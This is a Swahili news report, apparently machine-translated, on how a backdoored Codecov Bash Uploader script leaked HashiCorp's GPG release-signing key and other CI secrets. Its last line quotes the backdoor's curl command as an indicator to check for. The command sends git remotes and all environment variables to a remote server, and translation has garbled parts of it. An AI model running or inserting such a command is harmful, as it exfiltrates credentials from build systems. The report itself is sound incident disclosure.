HashiCorp, inayojulikana kwa kutengeneza zana huria za Vagrant, Packer, Nomad na Terraform, ilitangaza kuvuja kwa ufunguo wa kibinafsi wa GPG unaotumiwa kuunda sahihi za dijitali zinazothibitisha matoleo. Wavamizi waliopata ufikiaji wa ufunguo wa GPG wanaweza kufanya mabadiliko yaliyofichika kwa bidhaa za HashiCorp kwa kuyathibitisha kwa sahihi sahihi ya dijitali. Wakati huo huo, kampuni hiyo ilisema kuwa wakati wa ukaguzi, hakuna athari za majaribio ya kufanya marekebisho kama haya yaliyotambuliwa.
Kwa sasa, ufunguo wa GPG ulioathiriwa umebatilishwa na ufunguo mpya umeanzishwa mahali pake. Tatizo liliathiri uthibitishaji pekee kwa kutumia faili za SHA256SUM na SHA256SUM.sig, na halikuathiri utengenezaji wa sahihi za kidijitali za Linux DEB na vifurushi vya RPM vinavyotolewa kupitia releases.hashicorp.com, pamoja na njia za uthibitishaji za macOS na Windows (AuthentiCode) .
Uvujaji huo ulitokea kutokana na matumizi ya hati ya Codecov Bash Uploader (codecov-bash) katika miundombinu, iliyoundwa ili kupakua ripoti za chanjo kutoka kwa mifumo inayoendelea ya ujumuishaji. Wakati wa shambulio la kampuni ya Codecov, mlango wa nyuma ulifichwa kwenye hati maalum, ambayo nywila na funguo za usimbuaji zilitumwa kwa seva ya washambuliaji.
Ili kudukua, washambuliaji walichukua fursa ya hitilafu katika mchakato wa kuunda picha ya Codecov Docker, iliyowaruhusu kutoa data ya ufikiaji kwa GCS (Hifadhi ya Wingu la Google), muhimu kufanya mabadiliko kwenye hati ya Bash Uploader iliyosambazwa kutoka codecov.io. tovuti. Mabadiliko hayo yalifanywa mnamo Januari 31, yalikaa bila kutambuliwa kwa miezi miwili na kuwaruhusu washambuliaji kutoa taarifa zilizohifadhiwa katika mazingira ya mfumo wa ujumuishaji wa wateja. Kwa kutumia msimbo hasidi ulioongezwa, washambuliaji wanaweza kupata taarifa kuhusu hazina ya Git iliyojaribiwa na vigezo vyote vya mazingira, ikiwa ni pamoja na ishara, funguo za usimbaji fiche na manenosiri yanayotumwa kwa mifumo inayoendelea ya kuunganisha ili kupanga ufikiaji wa msimbo wa programu, hazina na huduma kama vile Amazon Web Services na GitHub.
Kando na simu hiyo ya moja kwa moja, hati ya Kipakiaji cha Codecov Bash ilitumiwa kama sehemu ya vipakizi vingine, kama vile Codecov-action (Github), Codecov-circleci-orb na Codecov-bitrise-step, ambayo watumiaji wake pia wameathiriwa na tatizo. Watumiaji wote wa codecov-bash na bidhaa zinazohusiana wanapendekezwa kukagua miundomsingi yao, na pia kubadilisha manenosiri na vitufe vya usimbaji fiche. Unaweza kuangalia uwepo wa mlango wa nyuma kwenye hati kwa uwepo wa laini curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /pakia/v2 | kweli
Chanzo: opennet.ru